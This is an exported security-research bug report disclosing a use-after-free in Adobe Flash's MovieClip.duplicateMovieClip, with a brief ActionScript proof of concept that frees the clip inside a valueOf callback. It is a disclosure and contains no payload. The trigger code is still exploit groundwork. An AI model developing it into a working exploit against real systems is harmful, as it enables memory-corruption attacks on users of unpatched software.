search

velocitystorm / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-free in MovieClip.duplicateMovieClip #591

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or 
movie name parameter provided is an object with toString or valueOf defined, 
this method can free the MovieClip, which is then used. 

A minimal PoC follows:

this.createEmptyMovieClip("mc", 1);

mc.duplicateMovieClip( "mc",{valueOf : func});

function func(){

    trace("in func");
    mc.removeMovieClip();

        // Fix heap here

    return 5;

    }

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 15 Oct 2015 at 9:22

Attachments:

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 17 Dec 2015 at 11:13